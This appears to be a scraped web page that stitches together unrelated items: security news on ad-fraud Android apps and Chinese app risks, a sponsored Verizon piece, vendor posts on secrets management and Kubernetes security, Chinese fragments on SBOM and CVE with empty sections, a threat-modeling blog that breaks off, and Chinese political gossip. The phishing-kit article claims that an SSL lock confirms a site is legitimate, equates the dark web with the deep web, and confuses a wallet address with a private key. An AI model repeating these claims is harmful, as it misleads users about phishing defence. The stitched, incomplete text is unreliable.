I both love and hate Change Freeze season. I know it’s for the best because any changes that get made during this time will ultimately result in long hours at work undoing those changes. I also know that the temptation to experiment with things is very, very strong this time of year. But I feel like Change Freeze season will soon go the way of the aluminum Christmas tree when we get change management and deterministic network modeling systems in place to verify changes on a system-wide basis and not just sanity checking configs at a device level. Tracking, prototyping, and verification will solve our change freeze problems eventually. And that will make it the most wonderful time of the year all year long.


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22 apps on the Google Play Store had a massive security problem and millions of ...


22 apps on the Google Play Store had a massive security problem and millions of  ...

Google typically removes malicious apps from thePlay Store, and that’s not anything new or notable. It’s their digital storefront so they should stay on top of keeping it clean from potentially dangerous apps. However, after their last round of nixing 22 apps from thePlay Store, it turns out that maybe Google let some seriously malicious apps fly under the radar for a very long time.

Those 22 apps totaled around 2 million downloads on user devices, and they all had a malicious backdoor that was abused in an ad-clicking scheme. It started with the Sparkle Flashlight app, which was updated to include a secret app downloader back in June of this year after being on the Play Store since 2016, and then spready to a few other existing and new applications.

These apps would phone home to download the ad-fraud modules and would receive new commands every 80 seconds, which typically involved displaying and clicking on ads to generate revenue. To keep that hidden, the ads were displayed in a virtually nonexistent window that was zero pixels high and zero pixels wide. But even though users couldn’t see the ads, those apps would quickly drain battery and use tons of data in the background, even to the point where they would reopen after being force closed so they could continue to run in the background.

22 apps on the Google Play Store had a massive security problem and millions of  ...

To obfuscate things even further, this ad-fraud had devices spoofing their user agent strings to avoid false click detection. They would report to ad servers as several different models of iPhones as well as any of any of 249 models of Android devices.

It’s good news that Google has finally pulled these apps off the store, obviously, but the fact that they were available for so long through official channels and doing something so intrusive in the background really raises some eyebrows about how Google handles its storefront. It’d be one thing if these apps had to be sideloaded from a website, but being able to get malware to rival some awful windows viruses directly through Google Play doesn’t build much confidence in anyone.

And for anyone reading this, seriously, don’t install flashlight apps.

source: Ars Technica

5 things every business should focus on to be successful


There are so many factors that go into making a business successful, from hiring the right talent and developing a product roadmap to managing real estate, technology, and finances.

And if just one of those things falls through the cracks, everything that leadership has been working to build can come crashing down.

With so many moving parts, business leaders must remain laser-focused on the core qualities of a successful company.

By pursuing a set of clearly defined guiding values, business leaders can ensure that their organizations remain on the right path, even as employees, technology tools, and office space come and go.

Here are some things that should be on your list of priorities.

1. Security

Whether you're a consumer-facing or business-to-business company, keeping customer data secure is of the utmost importance. Between lost business, reduced productivity, and security investments, one study estimates that cybercrime costs businesses an average of $11.7 million a year.

Technology companies like Verizon have teams of security experts to protect against cyberattacks across its 4G LTE network, processing more than 1 million security threats daily. On top of strong user-authentication technology, Verizon ensures its customers' safety by installing firewalls, implementing procedures that guard against unauthorized access, and monitoring its networks around the clock.

2. Teamwork and partnership

Every great company is better than the sum of its parts. In a study of more than a thousand companies, Babson College and the Institute for Corporate Productivity found that high-performing firms are 5.5 times more likely to incentivize collaborative behavior . This is likely because collaborating enables you to tap into a larger pool of talent and lets each person focus on what they do best. But it's important for teams to have the right tools to collaborate.

When companies use Dell enterprise products with Verizon 4G LTE wireless built in, they can work hand in hand with Dell's team of Small Business Technology Advisers. These experts collaborate with businesses to assess their tech needs, provide solutions, and deliver future-proof technology that grows with the company ― and they're easily accessible by online chat or phone .

3. Speed

Business moves faster today than it ever has before. This means it's never been more important for executives to put their employees in a position where they can complete their tasks as quickly as possible.

Because of this, many companies choose Verizon, the largest, most reliable 4G LTE wireless network . With Verizon, employees can download emails in less than a second, an e-book in four seconds, and a five-minute video in 27 seconds.

4. Productivity

Productivity is the name of the game for businesses of all sizes. If employees aren't completing projects and driving tangible results, you're not going to be in business for very long.

Companies can boost productivity by equipping their teams with Lenovo's ThinkPad X1 2-in-1 Yoga laptop and tablet. The device's powerful eighth-generation Intel Quad Core processor delivers 35% better performance than the previous generation. And with dual Intel Thunderbolt 3 ports, the ThinkPad X1 Yoga enables faster data transfer up to 40 GBs over USB-C, four times the data and times the video bandwidth of any other port type.

5. Employee satisfaction

It's always important to make sure your employees are content with their work. Positive workplace environments help companies attract the best talent, and happy workers have been found to be 12% more productive than the average employee. Things like recruitment bonuses, career growth, and paid time off for volunteer work are some of the things that help to keep employees happy.

By focusing on these five values across their various departments, business leaders can build growing, sustainable firms that are ready for continuously evolving future. All it takes is some planning and some follow-through.

Learn more about how Verizon can take your business to the next level.

This post is sponsored by Verizon.


Chinese Mobile App Companies Are a National Security Risk, Says a Top Democrat

Chinese mobile app companies pose the same national security risk to the US as telecom giants like Huawei and ZTE, Sen. Mark Warner said in an interview. From a report:

Recent US legislation largely banned Huawei and ZTE from use by the government and its contractors , due to concerns about surveillance and other national security risks. Now Warner, the top Democrat on the Senate Intelligence Committee, is signaling that Chinese app developers may face similar scrutiny from lawmakers, corporate America, and the intelligence community .

Warner's comments follow a recent BuzzFeed News report that popular apps from China's Cheetah Mobile and Kika Tech were exploiting user permissions to engage in a form of ad fraud . Eight Android apps with more than 2 billion total downloads were said to be engaging in a form of app-install ad fraud. Google subsequently removed two of the apps from the Play store and said it continues to investigate. Cheetah and Kika deny engaging in app-install fraud. "Under Chinese law, all Chinese companies are ultimately beholden to the Communist Party, not their board or shareholders, so any Chinese technology company -- whether in telecom or mobile apps -- should be seen as extensions of the state and a national security risk," Warner said in an interview this week with BuzzFeed News .

Further reading: Sen. Warner calls for US cyber doctrine, new standards for security .

Dark Web Phishing Kits: Cheap, plentiful and ready to trick you


Spam email is a part of daily life on the internet. Even the best junk mail filters will still allow through certain suspicious looking messages. If an illegitimate email tries to persuade you to click a link and enter personal information, then it is classified as a phishing attack.

Phishing attackers send out email blasts to large groups of people with the messages designed to look like they come from a reputable company, such as Google, Apple, or a banking or credit card firm. The emails will typically try to warn you about an error with your account and then urge you to click a link and log in with your credentials. Doing so will bring you to an imitation website where the attacker will attempt to steal your password, social security number, or other private data.

These days phishing attacks are becoming more widespread. One of the primary reasons is because of easy access to cybercrime kits on the dark web. With the hacker community growing, internet users need to take privacy seriously and remain vigilant against spam and other threats. Read on to learn more about this trend and how to protect yourself.

Dark Web Basics

The dark web, sometimes referred to as the deep web, operates as a separate environment on the internet. Normal web browsers, like Google Chrome or Mozilla Firefox, connect to the world wide web using the HTTP protocol. The dark web requires a special browser tool known as the TOR browser, which is fully encrypted and anonymous.

Dark Web Phishing Kits: Cheap, plentiful and ready to trick you

Image courtesy of Medium.com

Sites on the dark web cannot be indexed by search engines, so you’ll never stumble on that content through Google. When you connect through the TOR browser, all of your browsing traffic is sent through a global overlay network so that your location and identity cannot be tracked. Even IP addresses are masked on the dark web.

Hacker Markets

Much of what takes place in this cyber underworld is illegal or unethical in nature, and that includes the marketplaces that exist there. Think of these sites as blackmarket versions of eBay, where anonymous individuals can buy and sell illegal goods and services.

Recently, dark web markets have seen a surge in demands for cybercrime tools and utilities. Entire phishing kits are sold to buyers, which include spoofed pages that imitate real companies and full guides on how to launch an email phishing scam.

Dark Web Phishing Kits: Cheap, plentiful and ready to trick you

Image courtesy of Medium.com

When a spam email is sent out as part of a phishing scam, the messages are typically delivered through dark web servers that make it hard for junk filters to identify. In addition, the “From” address in the emails may look legitimate and use a valid domain like @gmail.com.

Phishing kits can be found for as less as two dollars, meaning that inexperienced hackers can launch a cybercrime effort with little funding or training. It’s interesting to note that personal data prices at the Dark Web supermarket range from a single dollar (Social Security card) to thousands (medical records).

Cryptocurrency Scandal

You should be on the lookout for phishing scandals related to any company or industry, but in particular, banking and financial attacks can be the most dangerous. If a hacker gains access to your credit card numbers or online banking password, then can commit fraud or even steal your identity.

The growing popularity of cryptocurrencies like Bitcoin and Ether have revolutionized the financial industry, but as a negative result of the trend, cybercriminals are now targeting these digital money systems. MyEtherWallet website , which allows users to store blockchain currency in a central location, has been victim to a number of phishing scams in recent months.

Dark Web Phishing Kits: Cheap, plentiful and ready to trick you
Image courtesy of MyEtherWallet.com

Because cryptocurrencies do not operate with a central bank or financial authority, you may not know what a legitimate email alert for one looks like. Phishing messages for MyEtherWallet will usually claim that there is an issue with your cryptocurrency account, or sometimes even suggest that you have a payment pending that needs to be verified.

Clicking on the link in the phishing email will launch your web browser and navigate to a spoofed page that looks like it is part of myetherwallet.com. However, the page is actually hosted on the hacker’s network and will feed directly into their illegitimate database. If you enter your private wallet address, which is a unique string of letters and numbers, the hacker can gain access to all of the funds in your account.

Preventative Measures

Phishing attacks are a type of cybercrime that targets individuals, so it’s up to you to be on guard for these messages and react appropriately. The first line of defense against phishing is to be skeptical of all emails that enter your inbox. Dark web hackers are getting better and better at imitating real companies with their spam and spoofing pages, so you need to look closely when examining the content. Always check the full URL of the links in email messages before you click one.

If you do get tricked and end up navigating to a spoofed page in your web browser, you still have a chance to protect yourself. All browsers support secure sockets layer (SSL) functionality and will display a lock icon or a green status bar at the top of the window when a website has been confirmed as legitimate. If you navigate to a webpage from an email that does not have a valid SSL certificate, you should close the browser immediately and permanently delete the email message.

The Bottom Line

Keep this in mind. As prices for phishing kits drop and supply increases, the allure of engaging in this kind of bad behavior will be too much to resist for an increasing number of people. Expect incidents of phishing attempts will increase. The general internet-browsing public should stay on high alert at all times when navigating their email inbox. Think first, then click.

Author Bio
Dark Web Phishing Kits: Cheap, plentiful and ready to trick you

Gary Stevens is a front-end developer. He’s a full-time blockchain geek and a volunteer working for the Ethereum foundation as well as an active Github contributor.

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Security Islands


The last decade has been an exciting time for the tech industry, with the advent of collaborative business practices like DevOps and modern tooling that enables us to go faster than ever. It’s made it really exciting to be part of a software team at a tech company and we’ve probably all heard the adage that “every company is now a tech company”.

There’s been an explosion of products on the market that are designed to help us achieve our business goals. But with the advent of these new workflows and tools, we’re beginning to identify additional risks that we need to mitigate if we’re going to protect our systems and our customers’ data.

In general, the modern pipelines we’ve created are well designed to improve flow and velocity and allow us to get new code rapidly built, tested, and deployed but are not always built for security. In fact, the threat models and vulnerabilities that need to be addressed expand.

One threat vector that we worry about in particular is exposed credentials and secrets, like those that are inadvertently shared in code repositories like GitHub or that may be exposed by vulnerabilities or over-privileging in the DevOps tools that have access to these secrets.

When you have all of these tools, and they each have their own mechanisms for managing security policy and access control, you end up with what we like to call “Security Islands”:

A security island is:

A tool or platform that comes built-in with its own security components (that manage secrets, access control, audit, compliance, etc) but that does not facilitate interoperability with other tools and/or aggregation of security policies, management, and audit data.

A security island is an isolated subsystem that makes it harder to manage the security of your system as a whole. This can be because the tool isn’t fully featured or isn’t interoperable but the end result is the same, that implementing security for the tools must happen piecemeal and without any centralized oversight.

Security Islands
Security Islands

When your systems are set up so that you’re forced to deal with security islands, you suffer from a lack of centralized audit and access control and it’s difficult to delegate authority to manage subsystems in any standardized way. You lack a centralized view of your entire security landscape, and it is increasingly difficult to manage at scale.

In addition, it’s possible to build human security islands. If security is too hard or complicated, teams will choose their own security tools and processes that are outside of official policies. In general this is often referred to as “Shadow IT”.

Getting to a better place

At CyberArk, we want to enable you to build a Continent of Trust that allows you to get away from security islands and instead weave your tools together in a way that connects them with your established systems of trust.

We’re not going to get away from having suites of disparate tools, but we can start to improve the experience of managing them by finding tools that let us tie them all together.

When you build a continent of trust, you get the benefit of centralized audit, access control, and administration. It’s easy to delegate authority and to manage at scale. You have the benefit of a centralized view of your overall security landscape and how the individual machines and services interact with each other.

In particular, to build a continent of trust for application privilege management, you need a system that lets you define your entire infrastructure, declare who and what can access which resources, audit all connections that are made, and monitor for unusual behavior.

In practice, you want the system that you use for centrally managing application privilege to enable you to:

Automate granting machine identity to applications and processes (like CI servers) Deploy applications so that they are prepared to seamlessly authenticate with the resources they need Centrally manage access control Reduce complications for developers so that Shadow IT is no longer necessary

On the Conjur team at CyberArk, our mission is to create such a centralized system for managing application privilege in dynamic environments. We provide integrations (like our Kubernetes authenticator ) to make it simple to bootstrap Conjur machine identity, and provide tools like Summon and Secretless Broker to simplify the process of connecting applications to the resources (like databases and APIs) that they need. We do this in a way that takes the onus off of developers as much as possible.

If you’re interested in learning more, please visit us atconjur.org or join us on Slack !

Exploring container security: This year, it’s all about security. Again.


Earlier this year at KubeCon in Copenhagen, the message from the community was resoundingly clear: “this year, it’s about security” . If Kubernetes was to move into the enterprise, there were real security challenges that needed to be addressed. Six months later, at this week’s KubeCon in Seattle, we’re happy to report that the community has largely answered that call. In general, Kubernetes has made huge security strides this year, and giant strides on Google Cloud. Let’s take a look at what changed this year for Kubernetes security.

Kubernetes attacks in the wild

Where developers go, hackers follow. This year, Kubernetes graduated from the CNCF , and it also earned another badge of honor: weathering its first real security attacks. Earlier this year, several unsecured Kubernetes dashboards made the news for leaking cloud credentials. At the time, Lacework estimated there of over 20,000 public dashboards, 300 were open without requiring any access credentials. (Note that Google Kubernetes Engine no longer deploys this dashboard by default .) Elsewhere, attackers added binaries to images on Docker Hub to mine cryptocurrency , which were then downloaded an estimated five million times and deployed to production clusters.

The majority of attacks against containers, however, remain “drive by” attacks―where an attacker is only interested in finding unpatched vulnerabilities to exploit. This means that the best thing you can do to protect your containers is to patch: your base image, your packages, your application code―everything. We expect attackers to start targeting containers more, but since containers make it easier to patch your environment , hopefully they’ll have less success.

Luckily, we also saw the community responding to security threats, by donating multiple security-related projects to the CNCF including SPIFFE , OPA , and Project Harbor .

Developing container isolation, together

Isolation was a hot topic for the container community this year, even though there still haven’t been any reports of container escapes in the wild, where an attacker gains control of a container, and uses it to gain control of other containers on the same host. The Kata Containers project kicked things off in December 2017, and other sandboxing technologies quickly followed suit in 2018, including gVisor and Nabla containers . While different in implementation, the goal of each of these technologies is to create a second layer of isolation for containerized workloads and bring defense-in-depth principles to containers, without compromising performance.

Container isolation is frequently misunderstood (after all, they don’t contain), and lack of isolation has been a primary argument against adopting them. Unlike virtual machines, containers don’t provide a strong isolation boundary on par with a hypervisor. That makes some users hesitant about running multi-tenant environments―deploying two containers for different workloads on the same VM―because they are worried that the workload in one container affecting the other. To address this, Kubernetes 1.12 added RuntimeClass, which lets you use new sandboxing technologies to isolate individual pods. RuntimeClass gives you the ability to select which runtime to use with each pod, letting you select hardening runtimes like gVisor or Kata depending on how much they trust the workload . With this tooling, the primary argument against containers is now one of its greatest strengths.

Protecting the software supply chain

At Google Cloud, we focused our efforts on securing the software supply chain―protecting your container from the base image, to code, to an application image, to what you deploy in production. Recently we released two new products in this space: Container Registry Vulnerability Scanning scans your images for known vulnerabilities; and Binary Authorization lets you enforce your policy requirements at deployment time. Both of these products are currently in beta.

Since a container is meant to be immutable, you’re constantly redeploying, and constantly pushing things down your supply chain. Binary Authorization gives you a single enforcement point where you can dictate what’s running in your environment. In addition to the GCP-hosted product, we also published an open-source reference implementation of Kritis , to ensure that your containers are scanned and patched for any known vulnerabilities before you let them into your environment.

Hardening GKE and its network

We keep GKE up to date with Kubernetes open-source releases, but we also introduce new features and new defaults to help you better protect your clusters. We made huge headway in network security recently, namely with the general availability of Private Clusters and Master Authorized Networks . Together, these help you further limit access to your cluster by malicious attackers who are scanning IP addresses for vulnerabilities. Now, you can restrict access to your cluster’s master to a set of whitelisted IP addresses, and can further ensure that your cluster’s nodes only have private IP addresses. And since GKE now works with shared Virtual Private Cloud , your network team can manage this environment directly. To learn more about GKE networking and network security, see the GKE network overview .

Then, in the small-but-mighty category, we turned node auto-upgrade on by default in the GCP Console. Unpatched environments are an easy target for attackers, and it only takes one missed security notice or delayed patch to be suddenly vulnerable. Node auto-upgrade delivers security patches automatically to keep your node up to date. Note that on GKE, Google manages and patches the control plane. While you probably didn’t notice it, our team has been very active patching GCP and GKE for linux and Kubernetes vulnerabilities this year, most notably last week !

In addition to new network security features, we are always striving to improve GKE’s default security settings, so you can implement security best practices without having to be a security expert. We’ve consolidated our hardening advice into a single guide that’s easy to follow, and noted when we’ve changed defaults. Note that this is an easy link to share with auditors.

There’s so much more we want to do and we’re going to keep on keeping on, so that 2019 can be all about security too. If you’re at KubeCon this year, check out some of our container security talks:

How Symlinks Pwned Kubernetes (And How We Fixed It) Tues Dec 11th, 10:50-11:25
Recent Advancements in Container Isolation Tues Dec 11th, 1:45-2:20 This Year, It’s About Security Tues Dec 11th, 4:30-5:05 So You Want to Run Vault in Kubernetes? Wed Dec 12th, 11:40-12:15 Navigating Workload Identity in Kubernetes Wed Dec 12th, 4:30-5:05 Shopify’s $25k Bug Report, and the Cluster Takeover That Didn’t Happen Thurs Dec 13th, 4:30-5:05

Hope to see you there!





一、建立普遍接受的协同披露程序:因为总是存在未知的未知数 概念1:网络安全中总是存在未知的未知数





二、引入软件物料清单:因为你不能保护你不知道你所拥有的 概念2:你不能保护你不知道你所拥有的

“心脏出血”与“想哭”病毒两大网络安全事件中,组织并不是不知道哪项软件具有漏洞,而是不知道哪项技术里包含具有漏洞的软件,这揭示了一个普遍现象,即组织缺乏对其环境中的技术的可见性,也就是说,在网络安全中,你不能保护你不知道你所拥有的。在这相隔三年的两件网络安全事件发生中,组织面临着同样的挑战,即事件发生后,各个企业和机构都急于去检查自身是否受影响,但由于不完整的技术物料清单,他们并不知道他们的系统与设备是否遭受到感染;再加上许多技术自带 “黑箱”性质,使得大部分企业和机构对于他们运行的软硬件并不了解,这种不可见性广泛存在,迫使组织盲目地依赖供应商提供的零星的、不透明的指南来减轻网络安全漏洞。对此,打开技术的黑箱成为当前网络安全工作的重中之重。

优先项2:引入软件物料清单(software bill of materials,简称SBOM)

物料清单(bill of materials,简称BOM)概念早已有之,并广泛存在于其他领域,主要是指是描述企业产品的总装件、分装件、组件、部件、零件、直到原材料之间的结构关系,以及所需的数量。报告引入软件物料清单,即详细列出技术的硬件、软件以及其他相关的组件。引入SBOM具有两大好处:一是允许组织基于已知的漏洞信息作出购买和使用技术的决定;二是当新漏洞被发现时,组织可借此快速定位到漏洞的位置并迅速止损。简而言之,SBOM可以帮助组织打开当前的技术黑箱,以完整评估他们的风险,更详细地了解组织存在的网络安全漏洞。

三、支持开源软件(OSS):因为软件不再是编写的,而是组装的 概念3:软件不再是编写的,而是组装的




四、完善通用漏洞披露(Common Vulnerabilities and Exposures,简称CVE)程序:因为必须要有一种共同的网络安全语言 概念4:必须要有一种共同的网络安全语言

CVE主要是收集各种网络安全漏洞并给予编号以便于公众查阅,目前由美国非营利组织MITRE与国土安全部联合运营,在过去20年为超过100000个漏洞提供了唯一的标识符。在当前世界中,一件网络安全事件可能在几分之一秒内发生,CVE程序能够及时识别漏洞,这对现代网络安全实践至关重要。目前,CVE已经成为一种网络安全的通用语言,它不仅为政府服务,同时还是现代网络安全建设的基石。但是目前CVE很难跟上漏洞曝光的速度, ID分配延迟了数周甚至数月,一些漏洞甚至被认为超出了CVE的范围而被拒绝标识,这对网络安全行业产生了重大的负面影响,网络安全中的共同语言正在消失。



五、实施技术生命周期支持战略:因为数字资产比物理资产老化速度更快,更难预测 概念5:数字资产比物理资产老化速度更快,更难预测




六、强化公私合作模式:因为网络安全需要“全社会”的路径 概念6:网络安全需要全社会的路径







What all Developers Need to Know about: Threat Modeling


― This post is part of a series of blog posts about all kinds of Security topics for Developers ―

Threat modeling is a process which far too few developers know about. It is a process that does what the name suggests: It helps you to model all threats to your application. Basically you make a list of threats, but in a structured way, such that you can assess the risks, and decide what to do about them.

Why do I need to do this?

I guess you can imagine the ‘why’, but since not many developers use threat modeling, I’ll try to explain it nonetheless. First of all, if you don’t know which threats there are for your application, you cannot do anything about them. It’s always better to know in advance and decide you accept the risk, then it is to regret after you lost half of your customers because of a security breach.

Although this is a security blog, and security is perhaps the most important reason for threats, issues can also occur because of more natural causes, like power outages, a flooded server room, or a disadvantageous bus factor . Those can be serious threats to your project too, and therefore to your company.

The last reason to do this, is simply because it’s fun to do. It fits the type of developer humor to poke holes in their own creations through all kinds of unrealistic scenarios. But while doing some of the brainstormy steps, you’ll also come across more realistic threats. We noticed that when someone came up with a totally outrageous and silly idea to extra data from our system, other people noted that it wasn’t so farfetched after all, and sketched out a quite reasonable approach to attack us.

When to do the modeling?

Typically, the best moment to do threat modeling is at the beginning of a project, but in practice you can choose any moment. Better to do threat modeling halfway or at the end, than never at all. An advantage of doing so near the end of the project is that you know the architecture and all the data flows much better, so it will be easier. A disadvantage of course is that it may be more work to fix bad design decisions.

If you’re new to threat modeling, I would still recommend to do your first session on an existing project. That makes it a lot easier to ‘try’ a threat modeling session and familiarize yourself with all the steps. You have a much clearer picture of all the assets and flow of data and probably that makes it a bit easier to think about the risks. Once you know the process, you can try this out in a new project to address the threats already in the design phase.

Over time you will notice you already take into account many threats while thinking about the initial design of a new feature.

Let’s get started

There’s different ways to approach the threat modeling session, and it totally depends on your company. If you’re in a big company, probably there’s already a strict formal process for doing threat modeling. Therefore, I’ll assume smaller companies or individuals who are new to threat modeling. OWASP has a nice cheat sheet for this, although it seems a bit long and abstract at first. I find the steps in decomposing and modeling the system the most useful.

I’ll discuss the relevant steps in more detail, because I guess that’s the most practical guideline for others to get started.

Identify the trusted boundaries of your system

It is important to know the boundaries of you system, because you cannot control everything. E.g. while the cookie store in the user’s browser contains sensitive data which is part of your system, you cannot control which browser the user has or how they use it. You can however control whether you use cookies at all, or which cookie flags you use to secure them. So, the choice where the boundaries lie is not always trivial.

This step will likely already cause some discussion, which is good. Here’s some of the things we consider:

Do we only look at software, or do wo also include the infrastructure? Should we include the reverse proxies or the firewall? What about our orchestration software? It’s managed by another team, so it’s mostly out of reach for us.

Often it doesn’t really matter what you include, as long as there’s consensus in the team, to avoid unnecessary discussion later. In later steps you may find that you still want to reconsider the boundaries. That’s fine, but if you do, don’t forget to look at the steps in between to see if the changed scope influences them.

Add actors

Perhaps a bit boring, but it’s important to know who are the users or actors in your system. These can be the regular end-users or administrators with browsers, but also hackers with apps or other tools. And what about those disgruntled colleagues? Missing a group of actors means you will probably miss a whole category of threats too, so make sure you don’t miss anyone. You may even want to split the group of hackers into script kiddies, professional hackers and governments.

Add information flows

Here we’re going to make a list of all the different types of data that flow through the system. E.g. you can make a list of all types of authentication tokens and cookies. For each piece of data, you’ll want to know where it goes. What components does it touch? This is important to later find out where the data can leak. The more components use the data, the more opportunities for a hacker to get access. E.g. session cookies are usually not needed behind your authentication gates, but often they are still available.

For each type of data, there may be different flows, depending on the situation. E.g. our Authentication service creates the Sessionids, but after creation they flow both to our Session store and to the cookie store in the user’s browser. Also, for each request from the user’s browser, the cookie is sent along and goes through several components again.

It may happen that already during this step you see a flow that makes you frown. Although we’re going to look at threat assessment in a later step, you might want to take notes here already. We find that while creating the information flows, we came up with half the threats that were on the final list. So, this is where the creativity starts.

Perform threat assessment

If you didn’t do so yet in the previous step, now is the ‘official’ moment to look at the information flows. For each type of data, for each flow, see if there are opportunities for any of the actors to get hold of some valuable information.

You may also include ‘threats’ like losing data after a disk crash, because of a lack of redundancy or backups.

Add a probability value to each threat

Now that the list of threats is complete, we can have a look at their likelihood. Maybe you included some of those very unlilely, improbable or exceptional situations that will only occur when Jupiter, Pluto and Proxima Centauri b are in 1 line, on Christmas eve. You can mark those as ‘low’ probability.

Others may be more likely, like developer colleagues that stick some new and shine library into your code, including backdoors.

Add a value for the impact of each threat

Whatever the value of the probability, suppose this threat really becomes reality. What would be the impact? Would the company loose a 100 dollars? Or would the company go bankrupt? It helps if you can really put a number to the impact, but again‘low’, ‘medium’, ‘high’ suffices.

Manage the risks



2016 年里约奥运会上,不熟悉大陆乒乓球队的台湾网友将教练刘国梁认成了官员,觉得全场就他不懂球。作为曾经的国乒一哥大满贯选手,刘国梁当然不是一个不懂球的胖子。





出生于 1944 年的鲁迪朱利安尼现年 74 岁,毕业于纽约大学法学院曾任纽约市长,因在 911 事件中所表现出来的突出领导力而被称为「美国市长」。












他表示这一切都是推特官方的阴谋。推特高层里有许多川普 Anti 粉( 黑子 ),他们故意在自己的这条推文里插入这种反川普的信息。并且,他气势汹汹的说,时代杂志的人也是差不多的讨厌鬼。





截止到现在鲁迪还未给出进一步的回应,也许他的手机和川普的一起被锁了起来。建议反戴 AirPods 耳机冷静一下。




他在 11 月 14 日的《网络安全基本法改正案》的审议会上公开表示自己其实根本不懂电脑,也不知道 USB 是什么。


▲樱田义孝阐述对USB的理解 图源:网络

樱田义孝的此番坦白却没能为他赢来喝彩,反而遭到了台下议员们的接连质询。在轮番攻击之下,樱田义孝解释道,现代手机已经十分方便了他更习惯用手机办公,电脑什么的就让助理帮忙操作就好了,他从 25 岁开始就是这么混过来的。


他的这一言论在日本以及国内都引起了不小的讨论,樱田义孝本人似乎觉得不妥,于是在之后 22 日的会议上又对自己进行了一次补刀。





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